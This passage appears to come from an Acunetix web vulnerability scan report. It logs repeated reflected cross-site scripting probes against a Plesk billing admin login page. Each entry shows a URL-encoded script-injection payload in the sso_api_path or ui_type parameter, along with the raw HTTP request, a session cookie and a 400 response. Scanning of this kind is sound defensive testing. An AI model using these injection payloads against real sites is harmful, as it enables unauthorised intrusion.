User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=icw7s5pdqfo8vija34r3mn3ijdllhfojnpz&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:18 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:18 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(946729)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScR
Acunetix Website Audit30
iPt%20%3eprompt%28946729%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 882
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...JMD2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=oiuo1znyttbbn4tii5j9fludllhfogmac&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2fr
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:18 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:18 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(994296)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28994296%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 872
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=ohkar5872rzsy18z2r3mpyh30dllhfn1zz3&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:17 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:17 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(966323)</ScRiPt>
Acunetix Website Audit31
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28966323%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Z%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=xh7fm5pytl68venj5o9ntx314dllhflgyxa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Connection: close
Expires: Fri, 28 Oct 2011 17:34:15 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:16 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(961264)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28961264%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 878
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=woyy3afcety9cfp4ht2gzmqjidllhflglly&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:15 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:15 GMT
Server: sw-cp-server
Content-Length: 124
Acunetix Website Audit32
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(905239)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28905239%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 872
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=kb6o8o1jup1xvat023q48obwudllhfk3hi9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:15 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:15 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(906924)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28906924%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 880
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=tnwmthto6bbbbdmsqv672stspdllhfmupb6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:16 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Acunetix Website Audit33
Date: Wed, 28 Sep 2011 17:34:17 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(938637)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28938637%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 870
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Qui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=mr11nzj4fvmp0lpbypseqdzlldllhflhvlc&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:16 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:16 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(968942)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28968942%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 884
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...D2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=gthavoihu30xh5rn2y17pmtz8dllhflhn6h&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:16 GMT
Acunetix Website Audit34
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:16 GMT
Server: sw-cp-server
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(984794)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28984794%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 833
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...1zj6q5YX0HfMipCFhpJseM09beHXcyRaJWCyFts1hDgnAGD5o8rSs0iK%2bvP1E%2bGBeaDmjmEi7PbIiYIgDeQhzDaEdIY9McQ8RVt8H2L2TY3fliXg8vnfsTx296vK1m866PJury63qBqWm8YgVNsm%2bCGL2YdxOUzVhX2u7Ti3Oh%2fPiTr6ThfYNVaZ626BNebX9JrSAZAi%2bSMu4qF1lCNMtJ9QcryR2sJyV%2bL2XIIeP2223%2f%2b9QLSp5Feykw6862JDgKhUNYsuRBo7abn8Agt4SiA%3d%3d-d449d26ccca058f8be3927999fb59010ee52315d&request_id=mxruwqfy9cair3mq4dg5bcvx9dllhfbl23c&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:11:55 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:11:55 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(902462)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28902462%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 839
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...feszIvUnxANZVZSy%2fz0XAaZWXWJeCZAjZOxLS9UAQG4xA8OVdG0RZ1O1b8rQtyVarYIOkntd0J11EiM5pHdGhmdoUpOCXumcARyNle8nfsmTpt7vtzv1yPnfAzT9bhdqnVTw1bNo1LTZWBiXsnOXSKGOG63aQ%2fxetZ%2bnXqxDL%2bNn8MTq3U4yNa2r1l6aDbHc9AayBj3kpqle9lTRpjezEJjehSpA9mi6K%2b9BBW8PR77%2bv%2beoROKbRQ98%2bKDzzECW5mSI83Y5IgpyuMPjQn%2bww%3d%3d-af7e49ce9dfa8345b75b5bc5c74a9491d10e7cdb&request_id=i7tm8twu1exhu2r8nhzv053dgdllhfb15hz&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Acunetix Website Audit35
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:11:54 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:11:55 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(961656)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 938
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...jMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=tnwmthto6bbbbdmsqv672stspdllhfmupb6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28961656%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:25 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(906571)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 930
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=ohkar5872rzsy18z2r3mpyh30dllhfn1zz3&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28906571%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit36
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:25 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:25 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(987281)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 928
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=mr11nzj4fvmp0lpbypseqdzlldllhflhvlc&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28987281%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:24 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(972732)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 994
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...H9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=xh7fm5pytl68venj5o9ntx314dllhflgyxa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28972732%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit37
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:24 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(966710)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 942
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=gthavoihu30xh5rn2y17pmtz8dllhflhn6h&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28966710%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:24 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(998606)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...yKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=xg4vbfmkb6zlp1yoqnjof5q6cdllhfof70a&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28998606%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit38
HTTP/1.1 400 Bad Request
